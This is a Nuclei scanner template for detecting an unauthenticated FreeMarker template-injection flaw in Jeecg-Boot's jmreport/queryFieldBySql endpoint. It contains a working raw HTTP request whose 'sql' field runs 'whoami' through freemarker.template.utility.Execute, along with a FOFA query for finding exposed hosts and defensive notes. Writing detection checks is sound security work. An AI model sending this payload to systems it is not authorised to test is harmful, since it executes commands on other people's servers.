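# Nuclei detection template: Jeecg-Boot report endpoint evaluates FreeMarker
# directives supplied in the "sql" field (template injection -> command
# execution).
#
# What the check does, as far as this file shows:
#   * sends one credential-less POST to /jeecg-boot/jmreport/queryFieldBySql
#   * the JSON body carries a FreeMarker directive inside the "sql" value
#   * the target is reported when the response is HTTP 200 and the body
#     contains a "fieldName" value starting with the marker "result:"
#
# Defender notes:
#   * The probe runs a command on the target, hence the "intrusive" tag so it
#     can be excluded from routine scans.
#   * Log/WAF detection can key on POSTs to the path above whose body contains
#     "freemarker.template.utility.Execute" or a "<#assign" directive.
id: jeecg-boot-rce

info:
  name: Jeecg-Boot jmreport queryFieldBySql - Remote Code Execution
  author: xiaokv
  severity: critical
  description: |
    The /jeecg-boot/jmreport/queryFieldBySql endpoint appears to render the
    submitted "sql" value as a FreeMarker template before using it, so a
    template directive in the request body is evaluated server-side. The
    request in this template carries no credentials.
  remediation: |
    Upgrade Jeecg-Boot and its bundled report component to a vendor-fixed
    release. Until then, block unauthenticated access to
    /jeecg-boot/jmreport/ at the reverse proxy or gateway.
  reference:
    - http://www.jeecg.com/
  metadata:
    # Exactly one request is sent below.
    max-request: 1
    # Quoted so the embedded double quotes are never re-interpreted by YAML.
    fofa-query: 'title="Jeecg-Boot" or "polyfill_7_2_5.js"'
  tags: jeecg-boot,rce,intrusive

http:
  - raw:
      # The empty line after the headers is required: without it the JSON
      # body is parsed as further header lines and no body is sent.
      - |
        POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 YaBrowser/23.3.4.603
        Content-Type: application/json

        {
        "sql":
        "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami\") }'"
        }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      # Marker emitted by the request's own "select 'result:...'" literal.
      # NOTE(review): this prefix would also be present if a fixed server
      # echoed the directive back unevaluated; confirm against a patched
      # instance and, if it does, add a negative word matcher on '<#assign'.
      - type: word
        part: body
        words:
          - '"fieldName":"result:'

      # Second condition so "matchers-condition: and" is meaningful and error
      # pages that happen to contain the marker are not reported.
      - type: status
        status:
          - 200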